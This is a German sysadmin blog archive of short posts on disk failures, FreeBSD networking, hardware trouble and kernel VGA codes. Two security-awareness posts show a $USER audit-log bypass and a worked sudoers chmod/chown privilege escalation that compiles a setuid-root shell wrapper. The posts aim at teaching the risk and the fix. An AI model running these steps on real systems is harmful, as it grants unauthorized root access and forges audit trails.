Archive for the ‘allgemein’ Category
Nachdem es um das Adminlife.net Projekt stiller geworden ist, und ich gerne an der Struktur der Seite usw. einiges ändern wollte, jedoch auf Matthias Webserver keinen root-Zugriff habe, haben wir uns drauf verständig, dass ich einen eigenen Blog eröffnen werde. Der alte Blog bleibt in seiner jetzigen Form erhalten, wird von uns jedoch nicht weiter geführt.
Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf ADMinLIFE. Also los: Reader umstellen! 
Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.
Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch – wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen – für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.
Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.
Edit: Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!
Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat!
Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:
#!/bin/bash
if [ "$USER" != "franz" ] && [ "$USER" != "karl" ]
then
echo "Zugriff verweigert."
else
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi
Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:
USER=franz ./domain-delete.sh [domain]
Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.
Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.
Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.
user@srv2342: ~> id
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)
Ich brauche zuerst ein kleines C-Tool:
user@srv2342: ~> cat > /foo/y.c
#include
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
STRG-D
Compilieren:
user@srv2342:/foo> cd /foo; gcc y.c -o y
Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:
user@srv2342:/foo> sudo /bin/chown 0:0 /foo/y
user@srv2342:/foo> sudo /bin/chmod 4775 /foo/y
user@srv2342:/foo ls -l
total 16
-rwsrwxr-x 1 root root 9217 Mar 26 14:52 y
-rw-r----- 1 user users 101 Mar 26 14:51 y.c
Root werden:
user@srv2342:/foo> ./y
srv2342:/foo # id
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
Owned!
Hier eine Kurzanleitung für all diejenigen, die ein FreeBSD unter kvm mit Point-to-Point benutzen wollen und daran verzweifelt sind, ins Netz zu kommen (dies ist ein kleiner Reminder für mich selbst *g):
Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.
/etc/rc.conf:
ifconfig_em0="inet 192.168.0.220 192.168.0.210"
static_routes="default"
route_default="-net 0.0.0.0 -iface -interface em0"
Ist auf der anderen Seite Linux im Einsatz, so macht man dort:
ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX
Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script).
In letzter Zeit hatte ich wirklich viel Hardwareärger – allerdings nur mit frisch gekaufter Neuhardware und nicht mit dem teils fast 10 Jahre alten Kram, den ich hier noch rumstehen habe…
Und zwar:
- 2 Asus AM2 Boards (Alternate): jeweils mit defektem Spannungswandler
- MSI-AM2 Motherboard (Alternate): der Lüfter läuft nach 1-2 Wochen zu schnell, da das Board dann falsche Sensorwerte über die Temperatur meldet
- Komplett-PC Sockel 775 (Mindfactory): diverse BIOS-Einstellungen falsch (DANKE an Mindfactory dafür, System war so nicht lauffähig) defekter Spannungswandler des Mainbords (Gigabyte)
- Bundle (Alternate): Asrock AM3 Board, DDR3, x2 250 von Alternate: Spring nichtmal an, kein BIOS-Piepser…
*Seufz*. Vor allem die extrem laut fiependen Spannungswandlern sind echt nervig – bei Asus scheinen einige Serien komplett davon betroffen zu sein.
Allgemein habe ich so das Gefühl, dass die Qualität und Kompatibilität der PC-Komponenten ab der DDR2-Genaration deutlich abgenommen hat… 
Microsoft und Asus haben eine neue Pro-Windows / Anti-Linux Kampagne mit dem Namen “It’s better with Windows” ins Leben gerufen. Leider lässt sich das Video auf der offiziellen Seite nicht abrufen, da die FLV Datei nicht mehr auf dem Server existiert. Daher ein Link zur YouTube Version des Videos.
Da ich sie immer wieder vergesse, hier als kleiner Reminder die Linux Kernel VGA Codes. Diese bestimmen die Framebuffer Auflösung und Farbtiefe:
[code language="css"]
+-------------------------------------------------+
| 640x480 800x600 1024x768 1280x1024
----+--------------------------------------------
256 | 0x301=769 0x303=771 0x305=773 0x307=775
32K | 0x310=784 0x313=787 0x316=790 0x319=793
64K | 0x311=785 0x314=788 0x317=791 0x31A=794
16M | 0x312=786 0x315=789 0x318=792 0x31B=795
+-------------------------------------------------+
[/code]
Noch mehr Codes gibt es bei Wikipedia.
